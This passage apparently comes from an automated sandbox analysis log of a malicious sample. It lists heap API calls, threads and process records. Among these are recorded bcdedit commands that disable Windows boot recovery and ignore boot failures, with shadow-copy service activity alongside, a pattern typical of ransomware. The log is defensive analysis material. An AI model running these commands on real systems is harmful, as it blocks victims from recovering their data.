GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17c0 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17e0 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1800 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1820 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1840 | out: hHeap=0x2c0000) returned 1 [0231.662] GetProcessHeap () returned 0x2c0000 [0231.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1860 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18c0 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e18e0 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1900 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1920 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1940 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1960 | out: hHeap=0x2c0000) returned 1 [0231.663] GetProcessHeap () returned 0x2c0000 [0231.663] 
HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1980 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e19a0 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e19c0 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e19e0 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a00 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a20 | out: hHeap=0x2c0000) returned 1 [0231.664] GetProcessHeap () returned 0x2c0000 [0231.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a40 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a60 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a80 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1aa0 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ac0 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ae0 | out: hHeap=0x2c0000) returned 1 [0231.665] GetProcessHeap () returned 0x2c0000 [0231.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b00 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 
lpMem=0x2e1b20 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b40 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b60 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1b80 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ba0 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1bc0 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1be0 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c00 | out: hHeap=0x2c0000) returned 1 [0231.666] GetProcessHeap () returned 0x2c0000 [0231.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c20 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c40 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c60 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1c80 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ca0 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1cc0 | out: hHeap=0x2c0000) returned 1 
[0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ce0 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d00 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d20 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d40 | out: hHeap=0x2c0000) returned 1 [0231.667] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d60 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1d80 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1da0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1dc0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1de0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e00 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e20 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e40 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e60 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 
[0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1e80 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ea0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ec0 | out: hHeap=0x2c0000) returned 1 [0231.668] GetProcessHeap () returned 0x2c0000 [0231.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1ee0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f00 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f20 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f40 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f60 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1f80 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fa0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fc0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1fe0 | out: hHeap=0x2c0000) returned 1 [0231.669] GetProcessHeap () returned 0x2c0000 [0231.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2000 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, 
dwFlags=0x0, lpMem=0x2e2020 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2040 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2060 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e20c0 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e20e0 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2100 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2120 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2140 | out: hHeap=0x2c0000) returned 1 [0231.670] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2160 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2180 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21a0 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21c0 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21e0 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2200 | out: 
hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2220 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2240 | out: hHeap=0x2c0000) returned 1 [0231.671] GetProcessHeap () returned 0x2c0000 [0231.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2260 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2280 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e22a0 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e22c0 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e22e0 | out: hHeap=0x2c0000) returned 1 [0231.672] GetProcessHeap () returned 0x2c0000 [0231.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2300 | out: hHeap=0x2c0000) returned 1 [0231.672] exit (_Code=0) Thread: id = 34 os_tid = 0x7a8 Thread: id = 36 os_tid = 0x8b4 Thread: id = 37 os_tid = 0xa20 Thread: id = 38 os_tid = 0x3a4 Thread: id = 39 os_tid = 0x434 [0230.008] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x339190 [0230.009] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x345fa0 [0230.009] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x2fe580 [0230.009] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x347530 [0230.009] LocalReAlloc (hMem=0x2fe580, uBytes=0x20, uFlags=0x2) returned 0x347640 [0230.011] LocalFree (hMem=0x339190) returned 0x0 [0230.012] LocalFree (hMem=0x347530) returned 0x0 [0230.012] LocalFree (hMem=0x347640) returned 0x0 [0230.012] LocalFree (hMem=0x345fa0) returned 0x0 Process: id = "8" image_name = 
"bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x48663000" os_pid = "0x540" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x434" cmd_line = "bcdedit /set {current} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x2a8 Process: id = "9" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x49dc7000" os_pid = "0x7fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x634" cmd_line = "bcdedit /set {current} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x80c Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x48b16000" os_pid = "0x81c" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = 
"C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005b7ab" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 26 os_tid = 0x8a0 Thread: id = 27 os_tid = 0x880 Thread: id = 28 os_tid = 0x86c Thread: id = 29 os_tid = 0x85c Thread: id = 30 os_tid = 0x84c Thread: id = 31 os_tid = 0x82c Thread: id = 33 os_tid = 0xa64 Thread: id = 130 os_tid = 0xa50 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT 
AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 40 os_tid = 0x15c Thread: id = 41 os_tid = 0xbe4 Thread: id = 42 os_tid = 0xa84 Thread: id = 43 os_tid = 0xbd0 Thread: id = 44 os_tid = 0xbd8 Thread: id = 45 os_tid = 0x6cc Thread: id = 46 os_tid = 0x42c Thread: id = 47 os_tid = 0x1e4 Thread: id = 48 os_tid = 0x6d0 Thread: id = 49 os_tid = 0x6bc Thread: id = 50 os_tid = 0x6b0 Thread: id = 51 os_tid = 0x698 Thread: id = 52 os_tid = 0x684 Thread: id = 53 os_tid = 0x678 Thread: id = 54 os_tid = 0x4a8 Thread: id = 55 os_tid = 0x46c Thread: id = 56 os_tid = 0x44c Thread: id = 57 os_tid = 0x424 Thread: id = 58 os_tid = 0x41c Thread: id = 59 os_tid = 0x404 Thread: id = 60 os_tid = 0x14c Thread: id = 61 os_tid = 0x3fc Thread: id = 62 os_tid = 0x3f4 Thread: id = 63 os_tid = 0x3e8 Thread: id = 64 os_tid = 0x39c Thread: id = 65 os_tid = 0x390 Thread: id = 66 os_tid = 0x37c Thread: id = 67 os_tid = 0x374 Thread: id = 68 os_tid = 0x1c4 Thread: id = 69 os_tid = 0x8e0 Thread: id = 70 os_tid = 0x35c Thread: id = 71 os_tid = 0xba4 Thread: id = 72 os_tid = 0x360 Thread: id = 73 os_tid = 0x688 Thread: id = 74 os_tid = 0x5b0 Thread: id = 75 os_tid = 0x330 Thread: id = 76 os_tid = 0x648 Thread: id = 77 os_tid = 0x7e8 Thread: id = 78 os_tid = 0x980 Thread: id = 79 os_tid = 0xa8c Thread: id = 80 os_tid = 0x7f0 Thread: id = 81 os_tid = 0x6b8 Thread: id = 82 os_tid = 0xa48 Thread: id = 83 os_tid = 0xbcc Thread: id = 84 os_tid = 0x83c Thread: id = 85 os_tid = 0x534 Thread: id = 86 os_tid = 0x9f0 Thread: id = 87 os_tid = 0x914 Thread: id = 88 os_tid = 0x4a0 Thread: id = 109 os_tid = 0xbec Thread: id = 110 os_tid = 0x434 Thread: id = 111 os_tid = 0x8c4 Thread: id = 112 os_tid = 0x950 Thread: id = 113 os_tid = 0xa20 Thread: id = 114 os_tid = 0x3a4 Thread: id = 115 os_tid = 0x7a8 Thread: id = 116 os_tid = 0x8b4 Thread: id = 117 os_tid = 0x570 Thread: id = 126 os_tid = 0xd4 Thread: id = 127 os_tid = 0xe0 Process: id = "12" 
image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 89 os_tid = 0x79c Thread: id = 90 os_tid = 0x638 Thread: id = 91 os_tid = 0x554 Thread: id = 92 os_tid = 0x720 Thread: id = 93 os_tid = 0x668 Thread: id = 94 os_tid = 0x65c Thread: id = 95 os_tid = 0x144 Thread: id = 96 os_tid = 0x110 Thread: id = 97 os_tid = 0x3f0 Thread: id = 98 os_tid = 0x3ec Thread: id = 99 os_tid = 0x3e4 Thread: id = 100 os_tid = 0x3e0 Thread: id = 101 os_tid = 0x3d0 Thread: id = 102 os_tid = 0x3cc Thread: id = 103 os_tid = 0x398 Thread: id = 104 os_tid = 0x394 Thread: id = 105 os_tid = 0x384 Thread: id = 106 os_tid = 0x380 Thread: id = 107 os_tid = 0x350 Thread: id = 108 os_tid = 0x33c Thread: id = 128 os_tid = 0xa9c Thread: id = 132 os_tid = 0xab8 Process: id = "13" image_name = "wmiprvse.exe" 
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x1bf97000" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0006793c" [0xc000000f] Thread: id = 118 os_tid = 0x55c Thread: id = 119 os_tid = 0x694 Thread: id = 120 os_tid = 0x4fc Thread: id = 121 os_tid = 0x8e4 Thread: id = 122 os_tid = 0x6d8 Thread: id = 123 os_tid = 0x7dc Thread: id = 124 os_tid = 0x738 Thread: id = 125 os_tid = 0xcc Thread: id = 131 os_tid = 0x7c8 Process: id = "14" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 133 os_tid = 0x8 Thread: id = 134 os_tid = 0xc0 Thread: id = 135 os_tid = 0x28 Thread: id = 136 os_tid = 0x44 Thread: id = 137 os_tid = 0x5c Thread: id = 138 os_tid = 0x4c Thread: id = 139 os_tid = 0x40 Thread: id = 140 os_tid = 0x30 Thread: id = 141 os_tid = 0x98 Thread: id = 142 os_tid = 0xb4 Thread: id = 143 os_tid = 0x38 Thread: id = 144 os_tid = 0xc4 Thread: id = 145 os_tid = 0xcc Thread: id = 146 os_tid = 0xd0 Thread: id = 147 os_tid = 0xb8 Thread: id = 148 os_tid = 0xd4 Thread: id = 149 os_tid = 0xd8 Thread: id = 150 os_tid = 0xdc Thread: id = 152 os_tid = 0xe8 Thread: id = 153 
